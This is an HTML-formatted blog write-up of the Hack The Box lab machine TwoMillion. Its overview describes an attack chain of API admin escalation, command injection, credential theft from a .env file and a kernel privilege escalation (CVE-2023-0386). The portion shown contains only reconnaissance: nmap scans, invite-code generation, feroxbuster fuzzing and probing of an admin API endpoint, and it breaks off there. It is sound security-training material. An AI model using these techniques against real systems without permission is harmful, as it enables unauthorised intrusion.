&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/31190">&lt;img src="https://www.hackthebox.com/badge/image/31190" alt="" style="display: unset">&lt;/a>&lt;br>&lt;br>&lt;a href="https://app.hackthebox.com/users/114053">&lt;img src="https://www.hackthebox.com/badge/image/114053" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About TwoMillion
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the &lt;code>.env&lt;/code> file. We then privesc to root by exploiting &lt;strong>&lt;code>CVE-2023-0386&lt;/code>&lt;/strong> and read the final root flag.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/two-million/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/TwoMillion">TwoMillion&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Makers&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/31190">&lt;img src="https://www.hackthebox.com/badge/image/31190" alt="" style="display: unset">&lt;/a>&lt;br>&lt;br>&lt;a href="https://app.hackthebox.com/users/114053">&lt;img src="https://www.hackthebox.com/badge/image/114053" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About TwoMillion
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the &lt;code>.env&lt;/code> file. We then privesc to root by exploiting &lt;strong>&lt;code>CVE-2023-0386&lt;/code>&lt;/strong> and read the final root flag.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scan all open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -p- -T4 --min-rate &lt;span style="color:#d3869b">10000&lt;/span> 10.10.11.221 -oA nmap/ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2023-07-25 16:21 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.11.221
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.27s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">65499&lt;/span> filtered ports, &lt;span style="color:#d3869b">34&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 40.02 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Further scan the open ports with default script and service scan flags:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -p22,80 -sC -sV 10.10.11.221 -oA nmap/service
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2023-07-25 16:24 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.11.221
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.66s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http nginx
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Did not follow redirect to http://2million.htb/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 20.33 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/service-scan.webp" alt="">&lt;p>Let&amp;rsquo;s add the domain name to the &lt;code>/etc/hosts&lt;/code> file.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> sudo &lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;10.10.11.221 2million.htb&amp;#34;&lt;/span> &amp;gt;&amp;gt; /etc/hosts
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now scan the port 80 again to see if anything changes:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -p80 -sC -sV 10.10.11.221 -oA nmap/http
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2023-07-25 16:39 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 2million.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.221&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.32s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http nginx
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-cookie-flags:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| /:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| PHPSESSID:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ httponly flag not &lt;span style="color:#fabd2f">set&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Hack The Box :: Penetration Testing Labs
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-trane-info: Problem with XML parsing of /evox/about
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 16.26 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Nothing interesting&amp;hellip;&lt;/p>
&lt;hr>
&lt;h2 id="port-80---http-nginx">Port 80 - HTTP (Nginx)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/two-million/port-80.webp" alt="">&lt;p>As I said earlier, in order to register a new account we have to solve this challenge:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/htb-invite-challenge.webp" alt="">&lt;p>I will be going through the challenge without detailed explanation assuming that you guys know the stuff already.&lt;/p>
&lt;h3 id="generate-invite-code">Generate invite code:&lt;/h3>
&lt;p>Send a post request to &lt;code>/api/v1/invite/generate&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XPOST &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/invite/generate&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The code is encoded in base64 you can either decode it using &lt;code>base64 -d&lt;/code> or be more cool and use &lt;a href="https://jqlang.github.io/jq/">&lt;code>jq&lt;/code>&lt;/a> instead. We can use the &lt;code>@base64d&lt;/code> format string to decode base64 encoding.&lt;/p>
&lt;ul>
&lt;li>&lt;code>-r&lt;/code> flag is used to get raw output of the filter (i.e. without quotes)&lt;/li>
&lt;li>&lt;code>.data.code&lt;/code> is used to get the value of &lt;code>code&lt;/code> inside &lt;code>data&lt;/code>&lt;/li>
&lt;li>we then pipe the output into &lt;code>@base64d&lt;/code> format string to decode the base64 value&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XPOST &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/invite/generate&amp;#39;&lt;/span> --silent | jq -r &lt;span style="color:#b8bb26">&amp;#39;.data.code | @base64d&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>2SLRO-WDS71-6ECIA-BTIJ5
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/invite-generate.webp" alt="">&lt;p>Now using this invite code we can register a new account and check the functionalities.&lt;/p>
&lt;h3 id="fuzzing-time">Fuzzing time:&lt;/h3>
&lt;p>I am using &lt;a href="https://github.com/epi052/feroxbuster">Feroxbuster&lt;/a> and dirsearch wordlist for a quick scan:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> feroxbuster -u http://2million.htb/ --no-recursion --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/dirsearch.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ___ ___ __ __ __ __ __ ___
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|__ |__ |__&lt;span style="color:#fe8019">)&lt;/span> |__&lt;span style="color:#fe8019">)&lt;/span> | / &lt;span style="color:#b8bb26">`&lt;/span> / &lt;span style="color:#b8bb26">\ \_&lt;/span>/ | | &lt;span style="color:#b8bb26">\ &lt;/span>|__
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| |___ | &lt;span style="color:#b8bb26">\ &lt;/span>| &lt;span style="color:#b8bb26">\ &lt;/span>| &lt;span style="color:#b8bb26">\_&lt;/span>_, &lt;span style="color:#b8bb26">\_&lt;/span>_/ / &lt;span style="color:#b8bb26">\ &lt;/span>| |__/ |___
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>by Ben &lt;span style="color:#b8bb26">&amp;#34;epi&amp;#34;&lt;/span> Risher 🤓 ver: 2.7.3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>───────────────────────────┬──────────────────────
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🎯 Target Url │ http://2million.htb/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🚀 Threads │ &lt;span style="color:#d3869b">50&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/dirsearch.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 👌 Status Codes │ &lt;span style="color:#fe8019">[&lt;/span>200, 204, 301, 302, 307, 308, 401, 403, 405, 500&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 💥 Timeout &lt;span style="color:#fe8019">(&lt;/span>secs&lt;span style="color:#fe8019">)&lt;/span> │ &lt;span style="color:#d3869b">7&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🦡 User-Agent │ feroxbuster/2.7.3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 💉 Config File │ /home/h4r1337/.config/feroxbuster/ferox-config.toml
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🏁 HTTP methods │ &lt;span style="color:#fe8019">[&lt;/span>GET&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🚫 Do Not Recurse │ &lt;span style="color:#fabd2f">true&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>───────────────────────────┴──────────────────────
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🏁 Press &lt;span style="color:#fe8019">[&lt;/span>ENTER&lt;span style="color:#fe8019">]&lt;/span> to use the Scan Management Menu™
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>──────────────────────────────────────────────────
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD GET 7l 11w 162c Got &lt;span style="color:#d3869b">301&lt;/span> &lt;span style="color:#fe8019">for&lt;/span> http://2million.htb/39a396fcdf9146a789798c2d83ce42ec &lt;span style="color:#fe8019">(&lt;/span>url length: 32&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD - - - http://2million.htb/39a396fcdf9146a789798c2d83ce42ec &lt;span style="color:#fe8019">=&lt;/span>&amp;gt; http://2million.htb/404
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD GET - - - Wildcard response is static; auto-filtering &lt;span style="color:#d3869b">162&lt;/span> responses; toggle this behavior by using --dont-filter
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD GET 7l 11w 162c Got &lt;span style="color:#d3869b">301&lt;/span> &lt;span style="color:#fe8019">for&lt;/span> http://2million.htb/e4a3055cc9a64e0bb20aacb1d4ae37ffb441b4c8fcf5452f9ab15d4b36d50eda7b7fbd4b1d82425c95406f6fd304e83c &lt;span style="color:#fe8019">(&lt;/span>url length: 96&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD - - - http://2million.htb/e4a3055cc9a64e0bb20aacb1d4ae37ffb441b4c8fcf5452f9ab15d4b36d50eda7b7fbd4b1d82425c95406f6fd304e83c &lt;span style="color:#fe8019">=&lt;/span>&amp;gt; http://2million.htb/404
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">200&lt;/span> GET 1242l 3326w 0c http://2million.htb/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">200&lt;/span> GET 46l 152w 0c http://2million.htb/404
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">401&lt;/span> GET 0l 0w 0c http://2million.htb/api
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">403&lt;/span> GET 7l 9w 146c http://2million.htb/assets/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">403&lt;/span> GET 7l 9w 146c http://2million.htb/controllers/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">403&lt;/span> GET 7l 9w 146c http://2million.htb/css/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">403&lt;/span> GET 7l 9w 146c http://2million.htb/fonts/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">302&lt;/span> GET 0l 0w 0c http://2million.htb/home &lt;span style="color:#fe8019">=&lt;/span>&amp;gt; http://2million.htb/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">403&lt;/span> GET 7l 9w 146c http://2million.htb/images/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">200&lt;/span> GET 96l 285w 0c http://2million.htb/invite
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">403&lt;/span> GET 7l 9w 146c http://2million.htb/js/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">302&lt;/span> GET 0l 0w 0c http://2million.htb/logout &lt;span style="color:#fe8019">=&lt;/span>&amp;gt; http://2million.htb/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">200&lt;/span> GET 1242l 3326w 0c http://2million.htb/views/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#928374;font-style:italic">####################] - 1m 13193/13193 0s found:15 errors:0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#928374;font-style:italic">####################] - 1m 13195/13193 182/s http://2million.htb/&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/fuzzing.webp" alt="">&lt;p>Let&amp;rsquo;s check further inside the &lt;code>/api&lt;/code> endpoint using some specific wordlists from &lt;a href="https://github.com/danielmiessler/SecLists.git">seclists&lt;/a>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> feroxbuster -u http://2million.htb/api/ --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/api/objects.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ___ ___ __ __ __ __ __ ___
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|__ |__ |__&lt;span style="color:#fe8019">)&lt;/span> |__&lt;span style="color:#fe8019">)&lt;/span> | / &lt;span style="color:#b8bb26">`&lt;/span> / &lt;span style="color:#b8bb26">\ \_&lt;/span>/ | | &lt;span style="color:#b8bb26">\ &lt;/span>|__
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| |___ | &lt;span style="color:#b8bb26">\ &lt;/span>| &lt;span style="color:#b8bb26">\ &lt;/span>| &lt;span style="color:#b8bb26">\_&lt;/span>_, &lt;span style="color:#b8bb26">\_&lt;/span>_/ / &lt;span style="color:#b8bb26">\ &lt;/span>| |__/ |___
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>by Ben &lt;span style="color:#b8bb26">&amp;#34;epi&amp;#34;&lt;/span> Risher 🤓 ver: 2.7.3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>───────────────────────────┬──────────────────────
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🎯 Target Url │ http://2million.htb/api/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🚀 Threads │ &lt;span style="color:#d3869b">50&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/api/objects.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 👌 Status Codes │ &lt;span style="color:#fe8019">[&lt;/span>200, 204, 301, 302, 307, 308, 401, 403, 405, 500&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 💥 Timeout &lt;span style="color:#fe8019">(&lt;/span>secs&lt;span style="color:#fe8019">)&lt;/span> │ &lt;span style="color:#d3869b">7&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🦡 User-Agent │ feroxbuster/2.7.3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 💉 Config File │ /home/h4r1337/.config/feroxbuster/ferox-config.toml
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🏁 HTTP methods │ &lt;span style="color:#fe8019">[&lt;/span>GET&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🔃 Recursion Depth │ &lt;span style="color:#d3869b">4&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>───────────────────────────┴──────────────────────
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 🏁 Press &lt;span style="color:#fe8019">[&lt;/span>ENTER&lt;span style="color:#fe8019">]&lt;/span> to use the Scan Management Menu™
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>──────────────────────────────────────────────────
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD GET 7l 11w 162c Got &lt;span style="color:#d3869b">301&lt;/span> &lt;span style="color:#fe8019">for&lt;/span> http://2million.htb/api/5030f00dc2f645de8293e52d19e06e72 &lt;span style="color:#fe8019">(&lt;/span>url length: 32&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD - - - http://2million.htb/api/5030f00dc2f645de8293e52d19e06e72 &lt;span style="color:#fe8019">=&lt;/span>&amp;gt; http://2million.htb/404
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD GET - - - Wildcard response is static; auto-filtering &lt;span style="color:#d3869b">162&lt;/span> responses; toggle this behavior by using --dont-filter
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD GET 7l 11w 162c Got &lt;span style="color:#d3869b">301&lt;/span> &lt;span style="color:#fe8019">for&lt;/span> http://2million.htb/api/fb7fa5e4ff13410d890e539d08e9ddab5934e9af97514708acd99ccc463694dbb32a685eae8f4ef69d7f71ae7d95fe2f &lt;span style="color:#fe8019">(&lt;/span>url length: 96&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>WLD - - - http://2million.htb/api/fb7fa5e4ff13410d890e539d08e9ddab5934e9af97514708acd99ccc463694dbb32a685eae8f4ef69d7f71ae7d95fe2f &lt;span style="color:#fe8019">=&lt;/span>&amp;gt; http://2million.htb/404
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">401&lt;/span> GET 0l 0w 0c http://2million.htb/api/v1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#928374;font-style:italic">####################] - 18s 3133/3133 0s found:3 errors:0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#928374;font-style:italic">####################] - 17s 3135/3133 174/s http://2million.htb/api/&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It&amp;rsquo;s showing &lt;code>401&lt;/code> so we need an account to view that any way:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/api-v1.webp" alt="">&lt;p>The &lt;code>/api/v1&lt;/code> list outs all the available api endpoints and we can see that there&amp;rsquo;s an endpoint to update admin settings &lt;code>/api/v1/admin/settings/update&lt;/code>. Let&amp;rsquo;s see what it does.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XPUT &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/settings/update&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">{&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;status&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;danger&amp;#34;&lt;/span>,&lt;span style="color:#b8bb26">&amp;#34;message&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;Invalid content type.&amp;#34;&lt;/span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>It looks like we can follow the error messges to determine all the parameters required.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl -XPUT &lt;span style="color:#b8bb26">&amp;#39;http://2million.htb/api/v1/admin/settings/update&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&amp;#39;&lt;/span> -H &lt;span style="color:#b8bb26">&amp;#39;Content-Type: application/json&amp;#39;&lt;/span>
